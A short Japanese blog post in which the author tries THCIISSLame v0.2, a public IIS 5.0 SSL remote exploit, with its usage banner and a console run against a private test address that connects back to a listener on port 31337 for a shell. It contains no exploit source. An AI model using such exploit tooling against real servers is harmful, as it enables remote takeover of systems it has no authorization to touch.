昨日のものと格闘中。そのまんまじゃだめなんだよな〜と思っているうちにv0.2にアップデート。任意のアドレスとポートへ接続できるようにまった模様。こんな感じ。日本語OSだと途中で止まる。

C:\temp>THCIISSLame.exe

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

Usage:    
Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337

C:\temp>THCIISSLame2.exe 192.168.1.15 192.168.1.1 31337

THCIISSLame v0.2 - IIS 5.0 SSL remote root exploit
tested on Windows 2000 Server german/english SP4
by Johnny Cyberpunk (jcyberpunk@thc.org)

[*] building buffer
[*] connecting the target
[*] exploit send
[*] waiting for shell

そのうちに言語に依存しないコードも出るんだろうなぁと。（なんか去年の7月みたい）